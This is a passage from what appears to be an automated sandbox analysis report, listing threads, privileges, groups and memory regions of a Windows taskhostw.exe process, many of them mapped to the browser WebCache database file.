"\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 5582 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 590 os_tid = 0x808 Thread: id = 591 os_tid = 0x7b0 Thread: id = 592 os_tid = 0x5c4 Thread: id = 593 os_tid = 0x4e0 Thread: id = 594 os_tid = 0x49c Thread: id = 595 os_tid = 0x47c Thread: id = 596 os_tid = 0x448 Thread: id = 597 os_tid = 0x124 Thread: id = 598 os_tid = 0x40 Thread: id = 599 os_tid = 0x7fc Thread: id = 600 os_tid = 0x7cc Process: id = "54" image_name = "taskhostw.exe" filename = "c:\\windows\\system32\\taskhostw.exe" page_root = "0xb936000" os_pid = "0x7d0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "43" os_parent_pid = "0x318" cmd_line = "taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}" cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4691 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4692 start_va = 0x51822b0000 end_va = 0x51822bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051822b0000" filename = "" Region: id = 4693 start_va = 0x51822c0000 end_va = 0x51822c6fff entry_point = 0x0 region_type = private name = "private_0x00000051822c0000" filename = "" Region: id = 4694 start_va = 0x51822d0000 end_va = 0x51822e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051822d0000" filename = "" Region: id = 4695 start_va = 0x51822f0000 end_va = 0x518236ffff entry_point = 0x0 region_type = private name = "private_0x00000051822f0000" filename = "" Region: id = 4696 start_va = 0x5182370000 end_va = 0x5182373fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005182370000" filename = "" Region: id = 4697 start_va = 0x5182380000 end_va = 0x5182380fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005182380000" filename = "" Region: id = 4698 start_va = 0x5182390000 end_va = 0x5182391fff entry_point = 0x0 region_type = private name = "private_0x0000005182390000" filename = "" Region: id = 4699 start_va = 0x51823a0000 end_va = 0x518245dfff entry_point = 0x51823a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4700 start_va = 0x5182460000 end_va = 0x518255ffff entry_point = 0x0 region_type = private name = "private_0x0000005182460000" filename = "" Region: id = 4701 start_va = 0x5182560000 end_va = 0x51825dffff entry_point = 0x0 region_type = private name = "private_0x0000005182560000" filename = "" Region: id = 4702 start_va = 0x51825e0000 end_va = 0x51825e6fff entry_point = 0x0 region_type = private name = "private_0x00000051825e0000" filename = "" Region: id = 4703 start_va = 0x51825f0000 end_va = 0x518266ffff entry_point = 0x0 region_type = private name = "private_0x00000051825f0000" filename = "" Region: id = 4704 start_va = 0x5182670000 end_va = 0x5182670fff entry_point = 0x5182670000 region_type = mapped_file name = "taskhostw.exe.mui" filename = "\\Windows\\System32\\en-US\\taskhostw.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskhostw.exe.mui") Region: id = 4705 start_va = 0x5182680000 end_va = 0x5182680fff entry_point = 0x0 region_type = private name = "private_0x0000005182680000" filename = "" Region: id = 4706 start_va = 0x5182690000 end_va = 0x5182690fff entry_point = 0x0 region_type = private name = "private_0x0000005182690000" filename = "" Region: id = 4707 start_va = 0x51826a0000 end_va = 0x51826a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051826a0000" filename = "" Region: id = 4708 start_va = 0x51826b0000 end_va = 0x51826b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051826b0000" filename = "" Region: id = 4709 start_va = 0x51826c0000 end_va = 0x51826cffff entry_point = 0x0 region_type = private name = "private_0x00000051826c0000" filename = "" Region: id = 4710 start_va = 0x51826d0000 end_va = 0x5182857fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051826d0000" filename = "" Region: id = 4711 start_va = 0x5182860000 end_va = 0x51829e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005182860000" filename = "" Region: id = 4712 start_va = 0x51829f0000 end_va = 0x5183deffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051829f0000" filename = "" Region: id = 4713 start_va = 0x5183df0000 end_va = 0x5183ea7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005183df0000" filename = "" Region: id = 4714 start_va = 0x5183eb0000 end_va = 0x5183eb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005183eb0000" filename = "" Region: id = 4715 start_va = 0x5183ec0000 end_va = 0x5183ec0fff entry_point = 0x0 region_type = private name = "private_0x0000005183ec0000" filename = "" Region: id = 4716 start_va = 0x5183ed0000 end_va = 0x5183ed0fff entry_point = 0x5183ed0000 region_type = mapped_file name = "msctfmonitor.dll.mui" filename = "\\Windows\\System32\\en-US\\MsCtfMonitor.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\msctfmonitor.dll.mui") Region: id = 4717 start_va = 0x5183ee0000 end_va = 0x5183ee0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005183ee0000" filename = "" Region: id = 4718 start_va = 0x5183ef0000 end_va = 0x5183ef6fff entry_point = 0x0 region_type = private name = "private_0x0000005183ef0000" filename = "" Region: id = 4719 start_va = 0x5183f00000 end_va = 0x5183f05fff entry_point = 0x5183f00000 region_type = mapped_file name = "winmm.dll.mui" filename = "\\Windows\\System32\\en-US\\winmm.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winmm.dll.mui") Region: id = 4720 start_va = 0x5183f10000 end_va = 0x5183f10fff entry_point = 0x0 region_type = private name = "private_0x0000005183f10000" filename = "" Region: id = 4721 start_va = 0x5183f20000 end_va = 0x5183f27fff entry_point = 0x0 region_type = private name = "private_0x0000005183f20000" filename = "" Region: id = 4722 start_va = 0x5183f30000 end_va = 0x5183f30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005183f30000" filename = "" Region: id = 4723 start_va = 0x5183f40000 end_va = 0x5183f40fff entry_point = 0x0 region_type = private name = "private_0x0000005183f40000" filename = "" Region: id = 4724 start_va = 0x5183f50000 end_va = 0x5183f50fff entry_point = 0x0 region_type = private name = "private_0x0000005183f50000" filename = "" Region: id = 4725 start_va = 0x5183f60000 end_va = 0x5183f6ffff entry_point = 0x0 region_type = private name = "private_0x0000005183f60000" filename = "" Region: id = 4726 start_va = 0x5183f70000 end_va = 0x5183feffff entry_point = 0x0 region_type = private name = "private_0x0000005183f70000" filename = "" Region: id = 4727 start_va = 0x5183ff0000 end_va = 0x518406ffff entry_point = 0x0 region_type = private name = "private_0x0000005183ff0000" filename = "" Region: id = 4728 start_va = 0x5184070000 end_va = 0x51843a6fff entry_point = 0x5184070000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4729 start_va = 0x51843b0000 end_va = 0x518442ffff entry_point = 0x0 region_type = private name = "private_0x00000051843b0000" filename = "" Region: id = 4730 start_va = 0x5184430000 end_va = 0x51844affff entry_point = 0x0 region_type = private name = "private_0x0000005184430000" filename = "" Region: id = 4731 start_va = 0x5184530000 end_va = 0x518462ffff entry_point = 0x0 region_type = private name = "private_0x0000005184530000" filename = "" Region: id = 4732 start_va = 0x5184630000 end_va = 0x51846affff entry_point = 0x0 region_type = private name = "private_0x0000005184630000" filename = "" Region: id = 4733 start_va = 0x51846b0000 end_va = 0x51846bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051846b0000" filename = "" Region: id = 4734 start_va = 0x51846c0000 end_va = 0x51846cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051846c0000" filename = "" Region: id = 4735 start_va = 0x51846d0000 end_va = 0x51846dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051846d0000" filename = "" Region: id = 4736 start_va = 0x51846e0000 end_va = 0x51846effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051846e0000" filename = "" Region: id = 4737 start_va = 0x51846f0000 end_va = 0x51846fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051846f0000" filename = "" Region: id = 4738 start_va = 0x5184700000 end_va = 0x518470ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005184700000" filename = "" Region: id = 4739 start_va = 0x5184710000 end_va = 0x518471ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005184710000" filename = "" Region: id = 4740 start_va = 0x5184720000 end_va = 0x518472ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005184720000" filename = "" Region: id = 4741 start_va = 0x5184730000 end_va = 0x518473ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005184730000" filename = "" Region: id = 4742 start_va = 0x5184740000 end_va = 0x518474ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005184740000" filename = "" Region: id = 4743 start_va = 0x5184750000 end_va = 0x518475ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005184750000" filename = "" Region: id = 4744 start_va = 0x5184760000 end_va = 0x518476ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005184760000" filename = "" Region: id = 4745 start_va = 0x5184770000 end_va = 0x518576ffff entry_point = 0x0 region_type = private name = "private_0x0000005184770000" filename = "" Region: id = 4746 start_va = 0x5185770000 end_va = 0x5185773fff entry_point = 0x0 region_type = private name = "private_0x0000005185770000" filename = "" Region: id = 4747 start_va = 0x5185780000 end_va = 0x5185781fff entry_point = 0x0 region_type = private name = "private_0x0000005185780000" filename = "" Region: id = 4748 start_va = 0x5185790000 end_va = 0x5185790fff entry_point = 0x0 region_type = private name = "private_0x0000005185790000" filename = "" Region: id = 4749 start_va = 0x51857a0000 end_va = 0x518582ffff entry_point = 0x0 region_type = private name = "private_0x00000051857a0000" filename = "" Region: id = 4750 start_va = 0x5185830000 end_va = 0x518982ffff entry_point = 0x0 region_type = private name = "private_0x0000005185830000" filename = "" Region: id = 4751 start_va = 0x5189830000 end_va = 0x518d82ffff entry_point = 0x0 region_type = private name = "private_0x0000005189830000" filename = "" Region: id = 4752 start_va = 0x518d830000 end_va = 0x518d837fff entry_point = 0x0 region_type = private name = "private_0x000000518d830000" filename = "" Region: id = 4753 start_va = 0x518d840000 end_va = 0x518d84ffff entry_point = 0x518d840000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4754 start_va = 0x518d850000 end_va = 0x518d85ffff entry_point = 0x518d850000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4755 start_va = 0x518d860000 end_va = 0x518d86ffff entry_point = 0x518d860000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4756 start_va = 0x518d870000 end_va = 0x518d87ffff entry_point = 0x518d870000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4757 start_va = 0x518d880000 end_va = 0x518d88ffff entry_point = 0x518d880000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4758 start_va = 0x518d890000 end_va = 0x518d89ffff entry_point = 0x518d890000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4759 start_va = 0x518d8a0000 end_va = 0x518d8affff entry_point = 0x518d8a0000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4760 start_va = 0x518d8b0000 end_va = 0x518d8bffff entry_point = 0x518d8b0000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4761 start_va = 0x518d8c0000 end_va = 0x518d8cffff entry_point = 0x518d8c0000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4762 start_va = 0x518d8d0000 end_va = 0x518d8dffff entry_point = 0x518d8d0000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4763 start_va = 0x518d8e0000 end_va = 0x518d8effff entry_point = 0x518d8e0000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4764 start_va = 0x518d8f0000 end_va = 0x518d8fffff entry_point = 0x518d8f0000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4765 start_va = 0x518d900000 end_va = 0x518d90ffff entry_point = 0x518d900000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4766 start_va = 0x518d910000 end_va = 0x518d91ffff entry_point = 0x518d910000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4767 start_va = 0x518d920000 end_va = 0x518d92ffff entry_point = 0x518d920000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4768 start_va = 0x518d930000 end_va = 0x518d93ffff entry_point = 0x518d930000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4769 start_va = 0x518d940000 end_va = 0x518d9bffff entry_point = 0x0 region_type = private name = "private_0x000000518d940000" filename = "" Region: id = 4770 start_va = 0x518d9c0000 end_va = 0x518d9c7fff entry_point = 0x0 region_type = private name = "private_0x000000518d9c0000" filename = "" Region: id = 4771 start_va = 0x518d9d0000 end_va = 0x518d9dffff entry_point = 0x518d9d0000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4772 start_va = 0x518d9e0000 end_va = 0x518d9effff entry_point = 0x518d9e0000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4773 start_va = 0x518d9f0000 end_va = 0x518d9fffff entry_point = 0x518d9f0000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4774 start_va = 0x518da00000 end_va = 0x518da0ffff entry_point = 0x518da00000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4775 start_va = 0x518da10000 end_va = 0x518da8ffff entry_point = 0x0 region_type = private name = "private_0x000000518da10000" filename = "" Region: id = 4776 start_va = 0x518da90000 end_va = 0x518da9ffff entry_point = 0x518da90000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4777 start_va = 0x518daa0000 end_va = 0x518daaffff entry_point = 0x518daa0000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4778 start_va = 0x518dab0000 end_va = 0x518dab7fff entry_point = 0x0 region_type = private name = "private_0x000000518dab0000" filename = "" Region: id = 4779 start_va = 0x518dac0000 end_va = 0x518dacffff entry_point = 0x518dac0000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4780 start_va = 0x518dad0000 end_va = 0x518dadffff entry_point = 0x518dad0000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4781 start_va = 0x518dae0000 end_va = 0x518daeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000518dae0000" filename = "" Region: id = 4782 start_va = 0x518daf0000 end_va = 0x518dafffff entry_point = 0x518daf0000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4783 start_va = 0x518db00000 end_va = 0x518db0ffff entry_point = 0x518db00000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4784 start_va = 0x518db10000 end_va = 0x518db1ffff entry_point = 0x518db10000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4785 start_va = 0x518db20000 end_va = 0x518db2ffff entry_point = 0x518db20000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4786 start_va = 0x518db30000 end_va = 0x518db3ffff entry_point = 0x518db30000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4787 start_va = 0x518db40000 end_va = 0x518db4ffff entry_point = 0x518db40000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4788 start_va = 0x518db50000 end_va = 0x518db5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000518db50000" filename = "" Region: id = 4789 start_va = 0x518db60000 end_va = 0x518db6ffff entry_point = 0x518db60000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4790 start_va = 0x518db70000 end_va = 0x518db7ffff entry_point = 0x518db70000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4791 start_va = 0x518db80000 end_va = 0x518db8ffff entry_point = 0x518db80000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4792 start_va = 0x518db90000 end_va = 0x518db9ffff entry_point = 0x518db90000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4793 start_va = 0x518dba0000 end_va = 0x518dbaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000518dba0000" filename = "" Region: id = 4794 start_va = 0x518dbb0000 end_va = 0x518dbbffff entry_point = 0x518dbb0000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4795 start_va = 0x518dbc0000 end_va = 0x518dbcffff entry_point = 0x518dbc0000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4796 start_va = 0x518dbd0000 end_va = 0x518dbdffff entry_point = 0x518dbd0000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4797 start_va = 0x518dbe0000 end_va = 0x518dbeffff entry_point = 0x518dbe0000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4798 start_va = 0x518dbf0000 end_va = 0x518dbfffff entry_point = 0x518dbf0000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4799 start_va = 0x518dc00000 end_va = 0x518dc0ffff entry_point = 0x518dc00000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4800 start_va = 0x518dc10000 end_va = 0x518dc1ffff entry_point = 0x518dc10000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4801 start_va = 0x518dc20000 end_va = 0x518dc2ffff entry_point = 0x518dc20000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4802 start_va = 0x518dc30000 end_va = 0x518dc3ffff entry_point = 0x518dc30000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4803 start_va = 0x518dc40000 end_va = 0x518dc4ffff entry_point = 0x518dc40000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4804 start_va = 0x518dc50000 end_va = 0x518dc5ffff entry_point = 0x518dc50000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4805 start_va = 0x518dc60000 end_va = 0x518dc6ffff entry_point = 0x518dc60000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") 